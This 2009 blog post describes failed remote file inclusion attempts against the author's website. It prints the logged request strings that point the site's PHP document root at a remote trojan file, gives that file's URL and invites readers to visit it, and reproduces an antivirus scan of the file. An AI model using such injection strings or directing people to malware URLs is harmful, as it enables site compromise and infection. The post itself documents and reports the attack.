Multiple Attempts to Drop Trojan on This Website Failed

These are the Wassup details of the attack

69.65.41.165 2009-06-13 10:48:00

//?_SERVER[DOCUMENT_ROOT]=http://ww(…)omponents/com_frontpage/test.txt??
Referrer: Direct hit
Hostname: 69.65.41.165

• User Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)

• OS: WinVista
• BROWSER: IE 7

• 10:33:14 ->//?_SERVER[DOCUMENT_ROOT]=http://www.fox(…)com/components/com_frontpage/test.txt??
• 10:34:03 ->////?_SERVER[DOCUMENT_ROOT]=http://www.f(…)com/components/com_frontpage/test.txt??
• 10:34:30 ->/3099/google-treasure-chest-its-a-scam-a(…)com/components/com_frontpage/test.txt??
• 10:37:43 ->/3099////?_SERVER[DOCUMENT_ROOT]=http://(…)com/components/com_frontpage/test.txt??
• 10:37:46 ->////?_SERVER[DOCUMENT_ROOT]=http://www.f(…)com/components/com_frontpage/test.txt??
• 10:47:59 ->/3099////?_SERVER[DOCUMENT_ROOT]=http://(…)com/components/com_frontpage/test.txt??
• 10:48:00 ->////?_SERVER[DOCUMENT_ROOT]=http://www.f(…)com/components/com_frontpage/test.txt??

As you can see SERVER[DOCUMENT ROOT]= is a part of php code and they’ve attempted to change my domain root to that of http://www.foxreality.com which is part of Rupert Murdoch’s empire.

The hyperlinks above don’t work as the code failed. However, if you are brave, strip out the first bit and just go to http://www.foxreality.com/components/com_frontpage/test.txt?? as I did, and hopefully, your anti-virus or browser will kick in with a malware warning like mine did!   The malware is identified as a Trojan by my NOD32 anti-virus software as;  PHP/Small.NAC trojan

Conclusion

Someone has dumped a piece of malware on the Fox network and is now going round blogs and other websites to get them to point to the trojan and thus spread the nefarious package. It just needs one click!

As I type this, at 2009-06-13 10:51:43 I had two more attacks!!! That’s nine in the last few minutes.
Checking the web for references, I’ve found this Russian webpage where the trojan has been tested against various antivirus programs – about half don’t detect it and it’s from the end of May this year! See link, translated into English.

This is their test:

Файл test.txt получен 2009.05.27 20:52:02 (UTC)
Текущий статус: закончено Current status: finished
Результат: 16/40 (40%) Result: 16/40 (40%)
Цитата: Quote:
Антивирус Версия Обновление Результат Antivirus Version Update Result
a-squared 4.0.0.101 2009.05.27 Backdoor.PHP.Small.o!IK
AhnLab-V3 5.0.0.2 2009.05.27 HTML/Xema
AntiVir 7.9.0.168 2009.05.27 BDS/PHP.ali.1
Antiy-AVL 2.0.3.1 2009.05.27 -
Authentium 5.1.2.4 2009.05.27 -
Avast 4.8.1335.0 2009.05.27 -
AVG 8.5.0.339 2009.05.27 BackDoor.Generic_c.BTI
BitDefender 7.2 2009.05.27 Backdoor.PHP.ALI
CAT-QuickHeal 10.00 2009.05.27 -
ClamAV 0.94.1 2009.05.27 PHP.Shell-23
Comodo 1207 2009.05.27 Unclassified Malware
DrWeb 5.0.0.12182 2009.05.27 -
eSafe 7.0.17.0 2009.05.27 -
eTrust-Vet 31.6.6524 2009.05.27 -
F-Prot 4.4.4.56 2009.05.27 -
F-Secure 8.0.14470.0 2009.05.27 Exploit:PHP/Preamble.A
Fortinet 3.117.0.0 2009.05.27 -
GData 19 2009.05.27 Backdoor.PHP.ALI
Ikarus T3.1.1.57.0 2009.05.27 -
K7AntiVirus 7.10.746 2009.05.27 -
Kaspersky 7.0.0.125 2009.05.27 -
McAfee 5628 2009.05.27 -
McAfee+Artemis 5628 2009.05.27 -
McAfee-GW-Edition 6.7.6 2009.05.27 Trojan.Backdoor.PHP.ali.1
Microsoft 1.4701 2009.05.27 -
NOD32 4109 2009.05.27 PHP/Small.NAC
Norman 6.01.05 2009.05.27 -
nProtect 2009.1.8.0 2009.05.27 Backdoor.PHP.ALI
Panda 10.0.0.14 2009.05.27 -
PCTools 4.4.2.0 2009.05.21 PHP.ShellBot.M
Prevx 3.0 2009.05.27 -
Rising 21.31.21.00 2009.05.27 -
Sophos 4.42.0 2009.05.27 Troj/PHPBdoor-A
Sunbelt 3.2.1858.2 2009.05.27 -
Symantec 1.4.4.12 2009.05.27 -
TheHacker 6.3.4.3.332 2009.05.26 -
TrendMicro 8.950.0.1092 2009.05.27 -
VBA32 3.12.10.6 2009.05.27 Backdoor.PHP.Small.o
ViRobot 2009.5.27.1757 2009.05.27 -
VirusBuster 4.6.5.0 2009.05.27 PHP.ShellBot.M
Дополнительная информация Additional Information
File size: 1165 bytes
MD5…: f1a9b4e4b207cd38641061e1b72d4775
SHA1..: 33c02179e53c19e00897fb0c63501acc0a2233e8
SHA256: 0b3eef46d7111939962db133d2e75530fbb7946d92a33195ca 6b7f2e1affe43a
ssdeep: 24:kwauoGPmXvuH6dcFTGPmXvuH6dc4H6dcZ1Mpn6+YvKsLKPX VwuHENNTh:bBoC
gMQsCgMQfQu1M5XW0SNl
PEiD..: – PEiD ..: –
TrID..: File type identification TrID ..: File type identification
HyperText Markup Language (100.0%) HyperText Markup Language (100.0%)
PEInfo: – PEInfo: –
PDFiD.: – PDFiD.: –
RDS…: NSRL Reference Data Set RDS …: NSRL Reference Data Set

Needless to say I’ve blocked the source IP address now.  It was from GigeNET in Illinois, and they’ve been told!

Related posts:

1. Robert G Allen, Grants, and a Credit Card Slimeball

   Introduction This is a small investigation into mail lists and scammy companies.  Some companies are fine, but I always go...

2. Pligg Comment Spam

   Introduction An unfortunate consequence of posting stuff online is that you enable your ‘work’, ‘your words of wisdom’, your ‘copyright’...

3. Google Treasure Chest – Phone and Address List

   Pre-script Comments are now closed on this posting as Google Treasure Chest is dead. However, the problem has not gone...

4. Trouble with eclub.lv and Browsers

   WordPress User Registration Spam Last year I told how I tackled various sorts of spam hitting the website, in particular,...

5. Another One Bites the (Coal) Dust

   Third Solicitor Barred from Practice Andrew Nulty from Warrington is the third solicitor to get barred from the profession for...